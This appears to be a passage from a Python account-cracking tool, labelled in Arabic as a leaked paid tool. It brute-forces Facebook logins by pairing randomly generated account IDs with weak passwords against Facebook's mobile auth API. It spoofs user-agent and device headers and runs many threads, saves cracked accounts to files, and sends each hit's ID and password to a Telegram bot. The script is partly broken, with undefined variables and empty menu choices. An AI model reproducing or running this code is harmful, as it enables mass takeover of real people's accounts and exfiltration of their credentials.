    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2071.67 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.3572.39 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.4534.27 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.3031.27 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.3148.81 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.2379.17 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.4802.87 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.4584.56 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2767.79 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3086.92 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.4582.99 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.4625.45 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.2730.51 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3623.30 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.4067.65 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4378.69 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.2335.35 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3493.43 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.4411.43 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.3805.22 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.3354.93 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2258.60 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4445.97 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2218.66 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.4575.95 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.2250.74 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.2329.97 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.2972.76 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2764.78 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.2084.30 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4185.97 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2504.90 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.3106.79 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4098.23 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.2385.43 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.3384.77 Safari/537.36',
    'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2164.10 Safari/537.36']
logo = ('''  ''')

import requests
respo = requests.get(f"https://mail.google.com")
der=respo.headers
print(der['Date'])
class Main:
	def __init__(self):
		self.id = []
		self.ok = []
		self.cp = []
		self.loop = 0
		os.system("clear")
		print('')
		print( ''' 
/////////////////////////
//////////
//////////////////////
/////////
////////////////////

تم تسريب اداه ببجي مدفوعه
@elkayootelasly

 ''')
		print('')
		
		print(f'''{HH}
القناه الرسمية في التيلجرام   𓆩 @T_T_T_1234_T 𓆪
{Z}ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ
{G} ELKAYOOT
{Z}ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ
{F}[𝟵𝟲𝟮]{S}Jordan 🇯🇴  
{F}[𝟵𝟲𝟯]{S}Syria 🇸🇾	
{F}[𝟵𝟲𝟰]{S}Iraq 🇮🇶
{F}[𝟵𝟲𝟲]{S}Al-Jawf 🇸🇦
{Z}ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ	
{F}𝗧َِ𝗘َِ𝗟َِِ𝗘َِ𝗚َِ𝗥َِ𝗔َِ𝗠َِ :{Z} @elkayootelasly
''')
        
		print(f"{A} Chooose : ")
		syed = input(PP+"""' """+F1);os.system('clear')
		if syed in ["", ""]:
			exit()
		elif syed in ["", ""]:
			exit()
		elif syed in ["", ""]:
			os.system('xdg-open https://www.facebook.com/Nahid.Tera.papa.I.c.s.f?mibextid=ZbWKwL/')
			os.system("clear")
		DEVIL =input('\n حط رقم واحد [1]  ')
		if DEVIL in ["1", "01"]:
			self.fbtua()
		if DEVIL in ["1", "01"]:
			os.system('xdg-open https://github.com/Shobujrana')
		if DEVIL in ["1", "01"]:
			os.system('xdg-open https://www.facebook.com/groups/345580047297411/?ref=share_group_link/')
		if DEVIL in ["", ""]:
			os.system('xdg-open https://www.facebook.com/groups/indiacyberforce/?ref=share&mibextid=NSMWBT/')
		if DEVIL in ["1",  "01"]:
			self.old2()
			exit()
		else:
			print (" Select Correctly ")
			Main()
	
	def fbtua(self):
		x = 111111111
		xx = 999999999
		idx = "100000" 
		limit = 500000
		try:
			for n in range(limit):
				_ = random.randint(x,xx)
				__ = idx
				self.id.append(__+str(_))
			os.system('xdg-open https://www.facebook.com/Nahid.Tera.papa.I.c.s.f?mibextid=ZbWKwL')
			os.system('clear')
			print(logo) 
			print(f'''{HH}ID{A} َِELKAYOOT ➪ ﴾%s﴿'''%(len(self.id))) 
			with ThreadPoolExecutor(max_workers=30) as coeg:
				print(f'''{Z} 𝗣𝗔𝗦𝗦𝗣𝗢𝗥𝗧 : 
\n➪ 1234567890        
\n➪ 123456789         
\n➪ 12345678        
\n➪ 1234567       
\n➪ 123456       
{A}ㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡㅡ
➪ 
							''')
				print('')
				listpass = input("%s \033[1;97m اختار  ڪلمات السر الظاهرة امامك : %s"%(G,Y))
				if len(listpass)<=5:
					exit("\n%s [!] ضع ڪلمه واحده (1) "%(B))
				print("%s \033[2;32mPASSWORD\033[0;93m { \033[0;91m%s\033[0;93m }"%(G,listpass))
				os.system("clear")
				for user in self.id:
					coeg.submit(self.api, user, listpass.split("+"))
			exit(F1+" خلص الصيد 😒✌")
		except Exception as e:exit(str(e))
 
	def api(self, uid, pwx):
		ua = random.choice(ugen)
		sys.stdout.write("\r\r%s\033[1;97m {\033[2;32m \033[1;97m{\033[2;32 ELKAYOOT \033[1;97m }\033[1;31m{ %s/%s \033[1;31m}\033[1;97m{ شغال }\033[2;32m{ %s }\033[1;97m{ سيڪور }\033[1;31m{ %s }"%(B,self.loop, len(self.id), len(self.cp), len(self.ok))
		); sys.stdout.flush()
		for pw in pwx:
			pw = pw.lower()
			ses = requests.Session()
			headers = {
				"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), 
				"x-fb-sim-hni": str(random.randint(20000, 40000)), 
				"x-fb-net-hni": str(random.randint(20000, 40000)), 
				"x-fb-connection-quality": "EXCELLENT",
				"x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA",
				"user-agent": ua, 
				"content-type": "application/x-www-form-urlencoded", 
				"x-fb-http-engine": "Liger"
			}
			response = ses.get("https://b-api.facebook.com/method/auth.login?format=json&email="+str(uid)+"&password="+str(pw)+"&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=button_with_disabled&source=device_based_login&meta_inf_fbmeta=%20¤tly_logged_in_userid=0&method=GET&locale=en_US&client_country_code=US&fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&fb_api_req_friendly_name=authenticate&cpl=true", headers=headers) 
			if "session_key" in response.text and "EAAA" in response.text:
				print("\r{ OK }{ %s }{ %s }"%(uid, pw))
				self.cp.append("{ %s }{ %s }"%(uid, pw))
				tlg = (f'''\n
#جاك حساب 
ID : {uid} 

Pass : {pw} 

crl : https://www.facebook.com/profile.php?id={uid}

Tele : @T_T_T_1234_T
احتمال 70% يشتغل
صيد مثلا 10 متاحات وابدء افحص 
  
''')

				requests.get("https://api.telegram.org/bot"+str(token)+"/sendMessage?chat_id="+str(ID)+"&text="+str(tlg))
				print(' { OK }{ %s }'%(ua))
				open("OK.txt","a").write("{ %s }{ %s }\n"%(uid, pw))
				break
			elif "www.facebook.com" in response.json()["error_msg"]:
				print("\r{ CP }{ %s }{ %s }"%(uid, pw))
				self.cp.append("{ %s }{ %s }"%(uid, pw))
				print(' { CP }{ %s }'%(ua))
				open("CP.txt","a").write("{ %s }{ %s }\n"%(uid, pw))
				tlg = (f'''	
#جاك حساب فيس 
ID : {uid} 

Pass : {pw} 

crl : https://www.facebook.com/profile.php?id={uid}

Tele :@T_T_T_1234_T
احتمال 70% يشتغل
صيد مثلا 10 وابدء افحص

''')

				requests.get("https://api.telegram.org/bot"+str(token)+"/sendMessage?chat_id="+str(ID)+"&text="+str(tlg))
				break
			else:
				continue
 
		self.loop +=1  
try:Main()
except Exception as e:exit(str)
